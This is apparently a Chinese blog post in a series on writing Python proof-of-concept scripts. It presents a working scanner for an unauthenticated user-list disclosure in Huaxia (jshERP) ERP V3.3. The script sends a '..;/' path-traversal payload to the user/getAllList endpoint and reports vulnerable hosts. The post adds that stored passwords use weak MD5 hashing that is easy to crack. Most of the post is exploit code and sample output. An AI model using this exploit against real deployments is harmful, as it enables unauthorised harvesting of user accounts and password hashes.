Python-Poc编写(5)

一、背景

此次编写的是圈子中分享的华夏ERP信息泄露(userList)漏洞;测试该漏洞目前还是存在的;经过挖掘发现该ERP使用的用户密码加密方式是属于MD5加密;这是一种容易被攻击这撞库的加密方式可以说和明文传输没有区别。

二、POC编写

import argparse
import requests
import sys


# 创建poc模块接收参数
def cmd(url):
    # 创建payliad
    payload = "/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList"
    url1 = f"{url}{payload}"
    try:
        response = requests.get(url1, verify=False, timeout=3)  # 发送get请求,超时3秒
        if response.status_code == 200 and "userList" in response.text:
            print( f"【+】{url}存在该漏洞\n")
        else:
            print( f"【-】{url}不存在该漏洞\n")
    except Exception as e:
        print( f"【*】{url}存在异常;请检测!!\n")


def main():
    # 字符画
    banner = """
  _____        _          _____            _    
 |  __ \      | |        |  __ \          | |   
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   < 
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_\

作者:添衣&吹風  地址:https://blog.csdn.net/weixin_53884648

        """
    print(banner)
    print("华夏ERP-V3.3")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", dest="url", required=True, default=None, help="请输入url地址")
    args = parser.parse_args()
    cmd(args.url)


if __name__ == '__main__':
    main()

三、使用

python 华夏ERP.py -u http://x.x.x.x

  _____        _          _____            _
 |  __ \      | |        |  __ \          | |
 | |  | | __ _| |_ __ _  | |__) |__ _  ___| | __
 | |  | |/ _` | __/ _` | |  _  // _` |/ __| |/ /
 | |__| | (_| | || (_| | | | \ \ (_| | (__|   <
 |_____/ \__,_|\__\__,_| |_|  \_\__,_|\___|_|\_
作者:添衣&吹風  地址:https://blog.csdn.net/weixin_53884648


华夏ERP-V3.3
【+】http://x.x.x.x存在该漏洞

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值